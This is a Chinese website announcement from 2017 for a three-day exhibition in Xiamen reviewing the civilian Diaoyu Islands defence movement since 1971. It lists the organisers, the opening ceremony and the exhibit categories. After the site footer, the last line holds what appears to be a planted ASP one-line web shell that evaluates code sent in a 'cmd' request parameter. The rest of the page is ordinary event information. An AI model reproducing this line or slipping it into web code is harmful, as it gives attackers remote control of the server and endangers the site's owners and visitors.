网站公告

民间保钓运动回顾展公告

时间:2017-11-4 18:26:36  作者:总编辑  来源:秘书处  查看:351  评论:0
内容摘要:      1971--2017民间保钓运动回顾展回顾展时间:2017年11月26---28日(三天)回顾展地点:福建厦门思明区湖光路12号南湖公园南门西侧开幕式:2017年11月26日上午九点半参加开幕式成员:一、世保全体成员。...

      1971--2017民间保钓运动回顾展


民间保钓运动回顾展公告
回顾展时间:
20171126---28日(三天)

回顾展地点:福建厦门思明区湖光路12号南湖公园南门西侧

开幕式:20171126日上午九点半

参加开幕式成员:一、世保全体成员。二、协办单位成员。三、邀请参与过保钓运动的新老保钓。(时间跨度七十年代,九十年代,现代)四、爱国团体负责人。四、钓鱼岛专业学者。

回顾展内容:

一、文宣资料类:

  民间保钓运动从七十年代开始到现在从未停止过宣传,在这个过程中,制作和发行许多钓鱼岛的宣传资料,这次集中展示民间七十年代,九十年代,以及现在文宣资料,让大家通过文宣资料,了解钓鱼岛局势变化过程。

二、影视音响类:

  保钓运动过程音乐界制作多部音乐作品激励民间保钓运动发展前进,同时也有多部视频作品问世。这次集中展示这些作品。

三、保钓行动类:

  从九十年代开始,民间保钓运动从文宣和街头抗议转入实际的抗争,出海无数次,登上钓鱼岛两次。留下许多行动的实物,通过收集,让大家了解民间在钓鱼岛海域抗争的过程。

四、历史文献类:

五、钓鱼岛书籍资料类:46年历程,有许多钓鱼岛理论书籍,以及和钓鱼岛有关联的书籍,这次将做为专门一个栏目,尽可能的收集所有书籍,向大家展出。

六、民间保钓人物类:一些为钓鱼岛做出重大贡献的民间保钓人物。

七、钓鱼岛邮品类:近几年政府发行的钓鱼岛邮品,数量不多。

八、钓鱼岛产品:12年之后,陆续生产一些和钓鱼岛有关联的商品,这次也将集中展出。

九、中国政府在钓鱼岛问题上的作为

十、回顾展还向书法界征集一些和钓鱼岛有关联的作品,一同展出。

通过以上方面集中展示了民间保卫钓鱼岛46年的历程。

  民间保钓历程四十多年,无数的保钓前辈为钓鱼岛做出了巨大的贡献。保留下来许多珍贵的保钓实物。世界华人保钓联盟在庆祝成立五周年之即,向所有参与过保钓的世界各地华人华侨,港、澳、台,大陆的保钓爱国人士发出邀请,欢迎所有参与和支持保钓运动的爱国人士前来参观和交流。

回顾展的意义:

对民间保钓运动的一次洗礼。

让社会对民间保钓有更深层次的了解。

通过这个活动团结凝聚各地保钓力量。

    钓鱼岛问题还没有解决,民间保钓运动还需要延续。通过回顾展,为民间保钓运动发展加油!

回顾展主办:世界华人保钓联盟

回顾展协办:美国纽约保钓联合会  

      香港保钓行动委员会      

      台湾中华保钓协会

      中国民间保钓联合会

      中国“九一八”爱国网

 

                                    

                     世界华人保钓联盟

                      2017115



 

民间保钓运动回顾展公告

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):